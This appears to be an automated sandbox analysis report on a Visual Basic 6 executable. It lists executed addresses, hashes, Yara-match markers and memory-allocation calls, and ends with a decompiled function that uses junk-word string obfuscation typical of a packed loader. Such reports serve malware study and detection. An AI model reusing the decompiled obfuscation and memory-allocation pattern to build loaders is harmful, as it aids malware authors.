0x00401bbc
0x00401bbe
0x00401bc0
0x00401bc1
0x00401bc4
0x00401bc5
0x00401bc8
0x00401bcb
0x00401bce
0x00401bcf
0x00401bd3
0x00401bd5
0x00401bd7
0x00401bd9
0x00401bdb
0x00401bdd
0x00401bdf
0x00401be1
0x00401be1
0x00401be2
0x00401be4
0x00401be6
0x00401be8
0x00401bea
0x00401bec
0x00401bee
0x00401bf0
0x00401bf2
0x00401bf4
0x00401bf6
0x00401bf8
0x00401bfa
0x00401bfc
0x00401bfe
0x00401c00
0x00401c02
0x00401c04
0x00401c06
0x00401c08
0x00401c0a
0x00401c0c
0x00401c0d
0x00401c10
0x00401c11
0x00401c14
0x00401c17
0x00401c1a
0x00401c1b
0x00401c1f
0x00401c21
0x00401c23
0x00401c25
0x00401c27
0x00401c29
0x00401c2b
0x00401c2d
0x00401c2d
0x00401c2e
0x00401c30
0x00401c32
0x00401c34
0x00401c36
0x00401c38
0x00401c3a
0x00401c3c
0x00401c3e
0x00401c40
0x00401c42
0x00401c44
0x00401c46
0x00401c48
0x00401c4a
0x00401c4c
0x00401c4e
0x00401c50
0x00401c52
0x00401c54
0x00401c56
0x00401c58
0x00401c5a
0x00401c5c
0x00401c5e
0x00401c60
0x00401c62
0x00401c64
0x00401c66
0x00401c68
0x00401c6a
0x00401c6c
0x00401c6e
0x00401c70
0x00401c72
0x00401c74
0x00401c76
0x00401c78
0x00401c7a
0x00401c7c
0x00401c7e
0x00401c80
0x00401c82
0x00401c84
0x00401c86
0x00401c88
0x00401c8a
0x00401c8c
0x00401c8e
0x00401c90
0x00401c92
0x00401c94
0x00401c96
0x00401c98
0x00401c9a
0x00401c9c
0x00401c9d
0x00401c9f
0x00401ca6
0x00401ca8
0x00401caa
0x00401cad
0x00401cb0
0x00401cb2
0x00401cb4
0x00401cb6
0x00401cb7
0x00401cba
0x00401cbb
0x00401cbd
0x00401cc0
0x00401cc2
0x00401cc4
0x00401cc6
0x00401cc8
0x00401cca
0x00401ccc
0x00401cce
0x00401cd0
0x00401cd2
0x00401cd4
0x00401cd6
0x00401cd8
0x00401cda
0x00401cdc
0x00401cde
0x00401ce0
0x00401ce2
0x00401ce4
0x00401ce6
0x00401ce8
0x00401cea
0x00401cec
0x00401cee
0x00401cf0
0x00401cf2
0x00401cf4
0x00401cf6
0x00401cf8
0x00401cfa
0x00401cfc
0x00401cfe
0x00401d00
0x00401d02
0x00401d04
0x00401d06
0x00401d08
0x00401d0a
0x00401d0c
0x00401d0e
0x00401d10
0x00401d12
0x00401d14
0x00401d16
0x00401d18
0x00401d1a
0x00401d1c
0x00401d1e
0x00401d20
0x00401d22
0x00401d24
0x00401d26
0x00401d28
0x00401d2a
0x00401d2c
0x00401d2e
0x00401d30
0x00401d32
0x00401d34
0x00401d36
0x00401d38
0x00401d3a
0x00401d3c
0x00401d3e
0x00401d40
0x00401d42
0x00401d44
0x00401d46
0x00401d48
0x00401d4a
0x00401d4c
0x00401d4e
0x00401d50
0x00401d52
0x00401d54
0x00401d56
0x00401d58
0x00401d5a
0x00401d5c
0x00401d5e
0x00401d60
0x00401d62
0x00401d64
0x00401d66
0x00401d68
0x00401d6a
0x00401d6c
0x00401d6e
0x00401d70
0x00401d72
0x00401d74
0x00401d76
0x00401d78
0x00401d7a
0x00401d7c
0x00401d7e
0x00401d80
0x00401d82
0x00401d84
0x00401d86
0x00401d88
0x00401d8a
0x00401d8c
0x00401d8e
0x00401d90
0x00401d92
0x00401d94
0x00401d96
0x00401d98
0x00401d9a
0x00401d9c
0x00401d9e
0x00401da0
0x00401da2
0x00401da4
0x00401da6
0x00401da8
0x00401daa
0x00401dac
0x00401dae
0x00401db0
0x00401db2
0x00401db4
0x00401db6
0x00401db8
0x00401dba
0x00401dbc
0x00401dbe
0x00401dc0
0x00401dc2
0x00401dc4
0x00401dc6
0x00401dc8
0x00401dca
0x00401dcc
0x00401dce
0x00401dd0
0x00401dd2
0x00401dd4
0x00401dd6
0x00401dd8
0x00401dda
0x00401ddc
0x00401dde
0x00401de0
0x00401de2
0x00401de4
0x00401de6
0x00401de8
0x00401dea
0x00401dec
0x00401dee
0x00401df0
0x00401df2
0x00401df4
0x00401df6
0x00401df8
0x00401dfa
0x00401dfc
0x00401dfe
0x00401e00
0x00401e02
0x00401e04
0x00401e06
0x00401e08
0x00401e0a
0x00401e0c
0x00401e0e
0x00401e10
0x00401e12
0x00401e14
0x00401e16
0x00401e18
0x00401e1a
0x00401e1c
0x00401e1e
0x00401e20
0x00401e22
0x00401e24
0x00401e26
0x00401e28
0x00401e2a
0x00401e2c
0x00401e2e
0x00401e30
0x00401e32
0x00401e34
0x00401e36
0x00401e38
0x00401e3a
0x00401e3c
0x00401e3e
0x00401e40
0x00401e42
0x00401e44
0x00401e46
0x00401e48
0x00401e4a
0x00401e4c
0x00401e4e
0x00401e50
0x00401e52
0x00401e54
0x00401e56
0x00401e58
0x00401e5a
0x00401e5c
0x00401e5e
0x00401e60
0x00401e62
0x00401e64
0x00401e66
0x00401e68
0x00401e6a
0x00401e6c
0x00401e6e
0x00401e70
0x00401e72
0x00401e74
0x00401e76
0x00401e78
0x00401e7a
0x00401e7c
0x00401e7e
0x00401e80
0x00401e82
0x00401e84
0x00401e86
0x00401e88
0x00401e8a
0x00401e8c
0x00401e8e
0x00401e90
0x00401e92
0x00401e94
0x00401e96
0x00401e98
0x00401e9a
0x00401e9c
0x00401e9e
0x00401ea0
0x00401ea2
0x00401ea4
0x00401ea6
0x00401ea8
0x00401eaa
0x00401eac
0x00401eae
0x00401eb0
0x00401eb2
0x00401eb4
0x00401eb6
0x00401eb8
0x00401eba
0x00401ebc
0x00401ebe
0x00401ec0
0x00401ec2
0x00401ec4
0x00401ec6
0x00401ec8
0x00401eca
0x00401ecc
0x00401ece
0x00401ed0
0x00401ed2
0x00401ed3
0x00401ed5
0x00401ed7
0x00401ed9
0x00401edb
0x00401ee2
0x00401ee4
0x00401ee6
0x00401ee7
0x00401ee9
0x00401ee9
0x00401eeb
0x00401eed
0x00401eef
0x00401ef1
0x00401ef4
0x00401ef6
0x00401ef7
0x00401ef9
0x00401efb
0x00401efd
0x00401f02
0x00401f04
0x00401f06
0x00401f08
0x00401f0a
0x00401f0d
0x00401f0e
0x00401f0f
0x00401f11
0x00401f13
0x00401f15
0x00401f18
0x00401f1a
0x00401f1d
0x00401f1e
0x00401f1f
0x00401f21
0x00401f23
0x00401f26
0x00401f27
0x00401f29
0x00401f2b
0x00401f2f
0x00401f31
0x00401f33
0x00401f36
0x00401f37
0x00401f39
0x00401f3f
0x00401f48
0x00401f4a
0x00401f4c
0x00401f4e
0x00401f4f
0x00401f51
0x00401f54
0x00401f56
0x00401f57
0x00401f5a
0x00401f5b
0x00401f5e
0x00401f60
0x00401f62
0x00401f63
0x00401f65
0x00401f67
0x00401f69
0x00401f6b
0x00401f6d
0x00401f71
0x00401f72
0x00401f73
0x00401f7c
0x00401f7e
0x00401f82
0x00401f83
0x00401f86
0x00401f89
0x00401f8c
0x00401f8d
0x00401f90
0x00401f92
0x00401f93
0x00401f99
0x00401f9d
0x00401fa1
0x00401fa4
0x00401fa5
0x00401fab
0x00401faf
0x00401fb5
0x00401fb8
0x00401fb9
0x00401fbe
0x00401fbf
0x00401fc1
0x00401fc4
0x00401fc6
0x00401fc7
0x00401fc9
0x00401fcc
0x00401fcd
0x00401fd0
0x00401fd2
0x00401fd3
0x00401fd9
0x00401fdb
0x00401fe1
0x00401fe2
0x00401fe3
0x00401fe7
0x00401fea
0x00401feb
0x00401fef
0x00401ff1
0x00401ff1
0x00401ff3
0x00401ff5
0x00401ff7
0x00401ff9
0x00401ffb
0x00401ffd
0x00401fff
0x00402001
0x00402003
0x00402005
0x00402007
0x0040200b
0x0040200d
0x0040200f
0x00402011
0x00402013
0x00402015
0x00402017
0x00402019
0x0040201b
0x0040201d
0x0040201f
0x00402021
0x00402023
0x00402025
0x00402027
0x00402029
0x0040202b
0x0040202d
0x0040202f
0x00402031
0x00402033
0x00402035
0x00402037
0x00402039
0x0040203b
0x0040203d
0x0040203f
0x00402041
0x00402043
0x00402045
0x00402047
0x00402049
0x0040204b
0x0040204d
0x0040204f
0x00402051
0x00402053
0x00402055
0x00402057
0x00402059
0x0040205b
0x0040205d
0x0040205f
0x00402061
0x00402063
0x00402065
0x00402067
0x00402069
0x0040206b
0x00402071
0x00402073
0x00402075
0x00402076
0x00402077
0x00402079
0x0041de8c
0x0041de8f
0x0041de90
0x0041de91
0x0041de9c
0x0041de9d
0x0041dea9
0x0041deaf
0x0041deb0
0x0041deb1
0x0041deb4
0x0041debb
0x0041dec0
0x0041dec8
0x0041dec9
0x0041dece
0x0041ded5
0x0041dedf
0x0041dee0
0x0041dee3
0x0041dee4
0x0041dee9
0x0041def3
0x0041def8
0x0041df01
0x0041df07
0x0041df09
0x0041df0e
0x0041df18
0x0041df24
0x0041df41
0x0041df26
0x0041df26
0x0041df2b
0x0041df30
0x0041df35
0x0041df35
0x0041df53
0x0041df6b
0x0041df6e
0x0041df70
0x0041df7d
0x0041df9f
0x0041df7f
0x0041df7f
0x0041df81
0x0041df86
0x0041df8c
0x0041df92
0x0041df97
0x0041df97
0x0041dfa9
0x0041dfc4
0x0041dfca
0x0041dfcc
0x0041dfd9
0x0041dffe
0x0041dfdb
0x0041dfdb
0x0041dfe0
0x0041dfe5
0x0041dfeb
0x0041dff1
0x0041dff6
0x0041dff6
0x0041e005
0x0041e00c
0x0041e013
0x0041e013
0x0041e020
0x0041e025
0x0041e027
0x0041e02a
0x0041e034
0x0041e039
0x0041e03a
0x0041e03f
0x0041e046
0x0041e04c
0x0041e056
0x0041e05b
0x0041e064
0x0041e06a
0x0041e071
0x0041e07e
0x0041e086
0x0041e08a
0x0041e08b
0x0041e090
0x0041e097
0x0041e0a1
0x0041e0a5
0x0041e0a6
0x0041e0a9
0x0041e0aa
0x0041e0af
0x0041e0b0
0x0041e0ba
0x0041e0bf
0x0041e0c0
0x0041e0c2
0x0041e0c4
0x0041e0c9
0x0041e0d1
0x0041e0d9
0x0041e0dd
0x0041e0e1
0x0041e0e2
0x0041e0e4
0x0041e0ec
0x0041e0f1
0x0041e0f2
0x0041e0f4
0x0041e0f9
0x0041e0fb
0x0041e100
0x0041e108
0x0041e109
0x0041e10e
0x0041e111
0x0041e112
0x0041e11c
0x0041e124
0x0041e124
0x0041e129
0x0041e15a
0x0041e162
0x0041e16a
0x0041e172
0x0041e177

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040188D

Strings

VB5!6&*, xrefs: 00401888

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 513f47519e62c558089356fa33af26eff857b5094148f55927a6631ac3812abf
Instruction ID: ae4e0480b71bdb5e50507d0d144bc4322218e2023a2c6be982790d40f5dfbcbd
Opcode Fuzzy Hash: 513f47519e62c558089356fa33af26eff857b5094148f55927a6631ac3812abf
Instruction Fuzzy Hash: 5241D8A044E7C04FD30397744D6A6A23F709E53258B0A86EBC8C2CF4E3D119491AC36B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02234E85, Relevance: 5.0, Strings: 3, Instructions: 1291COMMON

Download Yara Rule

Strings

Gy, xrefs: 0222B764
FVrj, xrefs: 02229A0C
ld(C, xrefs: 0222B4CE

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID: FVrj$ld(C$Gy
API String ID: 0-476753298
Opcode ID: 25384af74746a986d6b7328f429941a4383f345041038daf2a264c24c72efba5
Instruction ID: 4a11e018dc06105ff41bb7a49b0b781045e273d184068363b3bb58738a450859
Opcode Fuzzy Hash: 25384af74746a986d6b7328f429941a4383f345041038daf2a264c24c72efba5
Instruction Fuzzy Hash: 89C266B1918389DFDB75CF78CC887DABBA2AF45310F45811EDC898B259C3718A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0222BC7B, Relevance: 4.8, Strings: 3, Instructions: 1086COMMON

Download Yara Rule

Strings

Gy, xrefs: 0222B764
FVrj, xrefs: 02229A0C
ld(C, xrefs: 0222B4CE

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: FVrj$ld(C$Gy
API String ID: 2167126740-476753298
Opcode ID: d733961eefac08b129b2118794c68c9f9e25a08ae112ea687f469b6de4f12954
Instruction ID: 4089f12c850e9f4e6058e2f5c94125d133b43a24172182b3c1923fb087e20633
Opcode Fuzzy Hash: d733961eefac08b129b2118794c68c9f9e25a08ae112ea687f469b6de4f12954
Instruction Fuzzy Hash: FA926371561329EFDB349FB8C8857EA77A2FF58300F41411AED8997224C3724A85CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022332ED, Relevance: 4.5, Strings: 3, Instructions: 732COMMON

Download Yara Rule

Strings

Gy, xrefs: 0222B764
FVrj, xrefs: 02229A0C
ld(C, xrefs: 0222B4CE

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID: FVrj$ld(C$Gy
API String ID: 0-476753298
Opcode ID: d5edfa789ca97572c32c4dd0fcc797bcf31bd5c888a6a5c00a425c1557aee63b
Instruction ID: 31a06e4a90bfb20ff9e9a573efd8b37829a560915bc2666001adacddc346d933
Opcode Fuzzy Hash: d5edfa789ca97572c32c4dd0fcc797bcf31bd5c888a6a5c00a425c1557aee63b
Instruction Fuzzy Hash: AB620EB2A14359DFCB748F74C9857DABBA2FF58310F46811ADC899B214C3759A84CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0222C18D, Relevance: 4.5, Strings: 3, Instructions: 714COMMON

Download Yara Rule

Strings

Gy, xrefs: 0222B764
FVrj, xrefs: 02229A0C
ld(C, xrefs: 0222B4CE

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: FVrj$ld(C$Gy
API String ID: 2167126740-476753298
Opcode ID: cdc2224b636d1271e867111dc3c23db278acbd117a7ec4b2cae40b78644e566d
Instruction ID: 30798aaedde745fbe700be3400270b9aced82adfd53096767e98d7fb4fbeaaa7
Opcode Fuzzy Hash: cdc2224b636d1271e867111dc3c23db278acbd117a7ec4b2cae40b78644e566d
Instruction Fuzzy Hash: EA620FB2914359EFDB748F74C9857DABBA2FF58310F46821ADC899B214C3715A84CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022205CC, Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

N>'?, xrefs: 02220689

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: N>'?
API String ID: 2167126740-416917456
Opcode ID: 8785a772230a2800624296e6ee6ee19bed5c3bf37a773bb3c6cdbe89cc8699c1
Instruction ID: 208858bfbed9455ba0b220ed08c54596ff0700e8350cd16106761fe0e0268e3b
Opcode Fuzzy Hash: 8785a772230a2800624296e6ee6ee19bed5c3bf37a773bb3c6cdbe89cc8699c1
Instruction Fuzzy Hash: 8E515DB1234315DFDB35CFE4C484BEA73A2AF51210F548156E48A8F26AC772C989CB43

Uniqueness

Uniqueness Score: -1.00%

Function 022336B9, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 459d840889dba852afc338965d3d982f6eee08da28ba012462ba4e134868deb5
Instruction ID: ff500df31ce1ea613ce2862302d16d893e3eb6b61696f8f43b2e42b3a4733da5
Opcode Fuzzy Hash: 459d840889dba852afc338965d3d982f6eee08da28ba012462ba4e134868deb5
Instruction Fuzzy Hash: 6BB1F5B2A2435A9BDB31CEA8CD987EA77E5AF48340F45416ADC4D9B304D3709E41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0222E24E, Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2836696d9b94b1cd1d478cda54aeb6f02a78de80027b82a37a97a5192e300a1
Instruction ID: bcf851c9627f8dfd2b27db12e24aec102d322efd4649fb59f0883e8aa2e07483
Opcode Fuzzy Hash: e2836696d9b94b1cd1d478cda54aeb6f02a78de80027b82a37a97a5192e300a1
Instruction Fuzzy Hash: DCB1EFB1A10399DFDF349EA4CD50BEE37A6BF55340F41802ADC8EAB218E3319A45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0222525E, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3fac3f0bf5e1e786087209cdbc2a6058e27096fa01b0552618b300ce6d844c99
Instruction ID: 98cef2ae4b97d3aaf8b4af5fe3e8f667f9977cfbe9c1cdc2e6f40b183546bc58
Opcode Fuzzy Hash: 3fac3f0bf5e1e786087209cdbc2a6058e27096fa01b0552618b300ce6d844c99
Instruction Fuzzy Hash: 5051E1311B62A16FC73D8A7854561E57BA1DF85700F681D9FF6828BAA3CB724283CA41

Uniqueness

Uniqueness Score: -1.00%

Function 022252EC, Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f127e4f6a1dbe43911cf7d9bf1b3b31e9ce6ddf3792f294ea7bdc38333d54c24
Instruction ID: 29682f04b8b95be7683b8af157dfdb6dec596099add0ad8d526cbe1b66e84042
Opcode Fuzzy Hash: f127e4f6a1dbe43911cf7d9bf1b3b31e9ce6ddf3792f294ea7bdc38333d54c24
Instruction Fuzzy Hash: E9418B300B72A12FC73D9A7854565A137A0DE95600F581DDBF38287AA3CB624383CA45

Uniqueness

Uniqueness Score: -1.00%

Function 022343CC, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a6860ef23f6f84b89c245a2b390c2bb417bb6211dd35df5d1460cd8e996785
Instruction ID: 9278e0f4cd8938792b592acac8783f1ae18a30dba20565508d20f98e03c77960
Opcode Fuzzy Hash: b6a6860ef23f6f84b89c245a2b390c2bb417bb6211dd35df5d1460cd8e996785
Instruction Fuzzy Hash: B0319CB6628244DFCB389EB89C55AE677A5BF05310F19016FE94ECB648D7719E44CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0222D568, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5008068e92339395260fda0f5f4a1e2ac1b6d41dcea28d27f1b93cdd94e6806
Instruction ID: fd066ae9756329acd6d680d4cfeffd7dd52c1881025dff5f7d6f03ac4bac1d45
Opcode Fuzzy Hash: c5008068e92339395260fda0f5f4a1e2ac1b6d41dcea28d27f1b93cdd94e6806
Instruction Fuzzy Hash: D6117C32918220DFC754AE75D44AAAFBBA0BF09740F56480ED9C6A2510D3750A80CF57

Uniqueness

Uniqueness Score: -1.00%

Function 0222CB08, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6bec58e38cb45f7d14c6149857bd6839cad4d622ab19242a98345ce6131018
Instruction ID: 534d7c8801d7000a808928624b2b84f035cf9c9ce7f1ad773d88d20d42b1e922
Opcode Fuzzy Hash: 9a6bec58e38cb45f7d14c6149857bd6839cad4d622ab19242a98345ce6131018
Instruction Fuzzy Hash: 6AC08C9350937A2EC9A21E78B7090AC180206A5130F02C3822021A660DE8428E8A0A02

Uniqueness

Uniqueness Score: -1.00%

Function 0222C77D, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 02232985, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.776543638.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb671bf6939724828b8b455f370287e8aac27af3f105d4d57f6f75c294b14bfe
Instruction ID: 30533ead29aef8f728b790a9f17d77aa703290ac037570552d48097833b4e796
Opcode Fuzzy Hash: fb671bf6939724828b8b455f370287e8aac27af3f105d4d57f6f75c294b14bfe
Instruction Fuzzy Hash: 64B01238311740CFC681EF09C180F8273B0FB08E80FC104C0E8108BF11C328E800C900

Uniqueness

Uniqueness Score: -1.00%

Function 0042105D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0042105D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a20, void* _a24, void* _a28, signed int* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				char* _v152;
				char _v160;
				void* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v208;
				short _t125;
				short _t133;
				signed int _t136;
				signed int _t142;
				signed int _t147;
				void* _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t194;

				_t193 = _t192 - 0xc;
				 *[fs:0x0] = _t193;
				L00401540();
				_v16 = _t193;
				_v12 = 0x4014c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t190);
				L004017B6();
				L004017B6();
				L004017B6();
				L004017B6();
				 *_a32 =  *_a32 & 0x00000000;
				_push(0xbe);
				L00401756();
				L0040183A();
				_v88 = 0x19;
				_v96 = 2;
				_v188 = _v60;
				_v60 = _v60 & 0x00000000;
				_v72 = _v188;
				_v80 = 8;
				_push( &_v96);
				_push(0xf9);
				_push( &_v80);
				_push( &_v112);
				L0040168A();
				_v152 = L"monacanthid";
				_v160 = 0x8008;
				_push( &_v112);
				_t125 =  &_v160;
				_push(_t125);
				L00401660();
				_v164 = _t125;
				L00401846();
				_push( &_v112);
				_push( &_v96);
				_push( &_v80);
				_push(3);
				L00401840();
				_t194 = _t193 + 0x10;
				if(_v164 != 0) {
					_push(_v32);
					_push(L"Pollenate4");
					L00401696();
					L0040183A();
					_push(0xa7);
					_push(L"Apokreos");
					L0040162A();
					L0040183A();
					_v192 = _v60;
					_v60 = _v60 & 0x00000000;
					_v72 = _v192;
					_v80 = 8;
					_push(0xea);
					_push( &_v80);
					_push( &_v96);
					L00401624();
					_push( &_v96);
					L00401834();
					L0040183A();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push(2);
					L00401840();
					_t194 = _t194 + 0xc;
				}
				_v136 = L"12/12/12";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push( &_v96);
				L004015E8();
				_v152 = 0xc;
				_v160 = 0x8002;
				_push( &_v96);
				_t133 =  &_v160;
				_push(_t133);
				L00401738();
				_v164 = _t133;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t136 = _v164;
				if(_t136 != 0) {
					_push(L"Sjkler7");
					_push(L"Antagonistiske");
					_push(L"ADDEDLY");
					_push(L"RESELLS");
					L00401822();
					if( *0x4233c0 != 0) {
						_v200 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v200 = 0x4233c0;
					}
					_v164 =  *_v200;
					_t142 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v64);
					asm("fclex");
					_v168 = _t142;
					if(_v168 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v164);
						_push(_v168);
						L004017C8();
						_v204 = _t142;
					}
					_v172 = _v64;
					_t147 =  *((intOrPtr*)( *_v172 + 0x110))(_v172,  &_v60);
					asm("fclex");
					_v176 = _t147;
					if(_v176 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x40258c);
						_push(_v172);
						_push(_v176);
						L004017C8();
						_v208 = _t147;
					}
					_t136 = _v60;
					_v196 = _t136;
					_v60 = _v60 & 0x00000000;
					L0040183A();
					L004017C2();
				}
				L004017B6();
				_push(0x421430);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t136;
			}

0x00421060
0x0042106f
0x0042107b
0x00421083
0x00421086
0x0042108d
0x0042109c
0x004210a5
0x004210b0
0x004210bb
0x004210c6
0x004210ce
0x004210d1
0x004210d6
0x004210e0
0x004210e5
0x004210ec
0x004210f6
0x004210fc
0x00421106
0x00421109
0x00421113
0x00421114
0x0042111c
0x00421120
0x00421121
0x00421126
0x00421130
0x0042113d
0x0042113e
0x00421144
0x00421145
0x0042114a
0x00421154
0x0042115c
0x00421160
0x00421164
0x00421165
0x00421167
0x0042116c
0x00421178
0x0042117e
0x00421181
0x00421186
0x00421190
0x00421195
0x0042119a
0x0042119f
0x004211a9
0x004211b1
0x004211b7
0x004211c1
0x004211c4
0x004211cb
0x004211d3
0x004211d7
0x004211d8
0x004211e0
0x004211e1
0x004211eb
0x004211f3
0x004211fb
0x004211ff
0x00421200
0x00421202
0x00421207
0x00421207
0x0042120a
0x00421214
0x00421227
0x0042122f
0x00421233
0x00421234
0x00421239
0x00421243
0x00421250
0x00421251
0x00421257
0x00421258
0x0042125d
0x00421267
0x0042126b
0x0042126c
0x0042126e
0x00421276
0x0042127f
0x00421285
0x0042128a
0x0042128f
0x00421294
0x00421299
0x004212a5
0x004212c2
0x004212a7
0x004212a7
0x004212ac
0x004212b1
0x004212b6
0x004212b6
0x004212d4
0x004212ec
0x004212ef
0x004212f1
0x004212fe
0x00421320
0x00421300
0x00421300
0x00421302
0x00421307
0x0042130d
0x00421313
0x00421318
0x00421318
0x0042132a
0x00421342
0x00421348
0x0042134a
0x00421357
0x0042137c
0x00421359
0x00421359
0x0042135e
0x00421363
0x00421369
0x0042136f
0x00421374
0x00421374
0x00421383
0x00421386
0x0042138c
0x00421399
0x004213a1
0x004213a1
0x004213ae
0x004213b3
0x004213fa
0x00421402
0x0042140a
0x00421412
0x0042141a
0x00421422
0x0042142a
0x0042142f

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0042107B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 004210A5
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 004210B0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 004210BB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 004210C6
#525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 004210D6
__vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 004210E0
#629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00421121
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00421145
__vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00421154
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00421167
__vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00421186
__vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00421190
#514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 0042119F
